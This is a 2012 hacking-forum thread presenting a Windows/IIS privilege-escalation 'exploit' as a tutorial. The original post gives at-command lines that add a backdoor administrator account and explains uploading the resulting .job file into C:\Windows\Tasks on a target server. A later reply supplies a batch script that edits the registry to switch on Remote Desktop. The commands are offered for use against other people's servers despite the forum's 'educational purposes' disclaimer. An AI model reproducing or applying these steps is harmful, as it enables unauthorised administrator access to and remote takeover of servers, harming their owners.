Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Windows Task Manager 0d4y :)

  • 0 Vote(s) - 0 Average


12-07-2012, 07:35 PM #1
b0x Offline b0x *******
Administrators
Posts:78 Threads:34 Joined:Jul 2012 Reputation: 4
Mood: None
Salam 3lykcom Tonguesmiley
Today We're Gonna Exploit Windows OS Smiley1
The Idea Of Bug here Is Editing Tasks [Add-Edit] In Tasks Manager
At First We've To Know Task'z Path'z
Code:
C:\Windows\Tasks\
So We'll Upload Task Smiley1 And When Admin Logins The Commands Will be eXecuted Biggrinsmiley
Oke ,, Now How Can We Make .job file -> Task File ?!
mmm ,, We can do it by at command in windows ,,, note : your os must be WINDOWS
Okay Biggrinsmiley The Command
At [TIME]/Interactive "[COMMAND]"
For eXample
Code:
at 12:00 /interactive "net user b0x b0x /add"
That's Great .. So How Can We Add More Than One Command ,, I Mean That Code Can Add User Account
How Can We Define It As Administrator ?!!
Will We Make Another Task File -> 2 Tasks At The sAme tIme ?!
I Think No Tonguesmiley We Can Use
Code:
&&
Just Edit Command To Be
Code:
at 12:00 /interactive "net user b0x b0x /add && net localgroup administrators b0x /add"
huh Good Biggrinsmiley
Now Go In Your System
C:\Windows\Tasks\
You'll See "At1.job" File .. Upload it in Server / IIS To This Path -->
Code:
C:\Windows\Tasks\
Yes Here The Exploit That You Can Upload Any Thing In That Path With Any Privilege
So If You Were Guest Tonguesmiley You Would Administrate Windows/IIS Server
Videos
Protected By MadLeeTs & Sec4ever
./b0x

12-07-2012, 09:01 PM #2
H4x0rl1f3 Offline Commander In Cheif *******
Administrators
Posts:1,121 Threads:25 Joined:Jun 2012 Reputation: 15
Mood: Stoned
UnderTaker is back with a Bang wink
good work buddy.

Always Aspect Reward from the Creator and not anyone or anything Created.
For Complaints & Help Contact:- [email protected]
Zone-h
http://zone-h.org/archive/notifier=H4x0rL1f3
I am the orphan of Gaza & Kashmir. Ruins of Iraq,Syria & Palestine Bombarded of Pakistan,Afghanistan, Mali & Yemen Change of Libya and Egypt Discriminated of Bahrain & Turkey Freedom of Earth's paradise and Al-AQSA. I am the hunger stricken child of Somalia, Ethopia, & rest of Africa I am the suffering of each and every single corner of the world. But Listen!!! Hope is what I am!!


12-07-2012, 09:13 PM #3
Dr.x00t Offline Respected *****
Respected
Posts:94 Threads:6 Joined:Jun 2012 Reputation: 0
Mood: None
yoyo nice bro Biggrinsmiley

?? ??? ??? ???? ???? ???? ????
Contact Me: Facebook.com/pkshadow.py

12-07-2012, 09:34 PM #4
zahidadeel Offline Respected *****
Respected
Posts:41 Threads:6 Joined:Jun 2012 Reputation: 0
Mood: None
awesome ..bro ur posts r always cooool Smiley1

12-07-2012, 09:51 PM #5
ThaDark Offline Respected *****
Respected
Posts:7 Threads:4 Joined:Sep 2012 Reputation: 0
Mood: None
nice bro [Image: biggrin.gif]

12-07-2012, 10:11 PM #6
superb work brother wink informative

Imperfection is beauty, madness is genius and it's better to be absolutely ridiculous than absolutely boring

12-07-2012, 10:34 PM #7
Hitcher Offline MadLeets Vip ******
V.I.P
Posts:52 Threads:6 Joined:Jun 2012 Reputation: 0
Mood: None
Thanks alot brother really great one always love your Tutorials brother but brother i have question if the rdp of server is off then how to be open it through same bug because without rdp adding new administrator account is Sadsmiley
can we add commands for open rdp too in that .job file Thanks alot for the share brother you are real devil Smiley1

12-08-2012, 12:08 AM #8
b0x Offline b0x *******
Administrators
Posts:78 Threads:34 Joined:Jul 2012 Reputation: 4
Mood: None
thank you all Smiley1
@Hitcher
Just Use This File Smiley1
Code:
@echo off
setlocal
if {%1}=={} goto syntax
:loop
if {%1}=={} goto finish
set remote="\\%1\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"
shift
reg.exe ADD %remote% /v fDenyTSConnections /t REG_DWORD /d 0 /f>nul 2>&1
if NOT %ERRORLEVEL% EQU 0 @echo %remote% NOT found.
goto loop
:syntax
@echo Syntax: RemoteDesktop b0x1 [b0x2 .... Nxb0x]
goto loop
:finish
endlocal

Save it rdp.cmd
in command use it
Code:
rdp.cmd 127.0.0.1
RDP Will Be Opened For 127.0.0.1 < SAME SERVER Smiley1
Have Fun Biggrinsmiley

12-08-2012, 01:17 AM #9
Tor Demon Offline MadLeets Vip ******
V.I.P
Posts:172 Threads:5 Joined:Jun 2012 Reputation: 0
Mood: None
what great tut bro Heart

MERCY IS NOT TO FORGIVE ThE PEOPLEAngrysmiley

12-08-2012, 01:20 AM #10
Hitcher Offline MadLeets Vip ******
V.I.P
Posts:52 Threads:6 Joined:Jun 2012 Reputation: 0
Mood: None
Love you brother Heart thanks a lot for Help Smiley1






Forum Jump:


Users browsing this thread:1 Guest(s)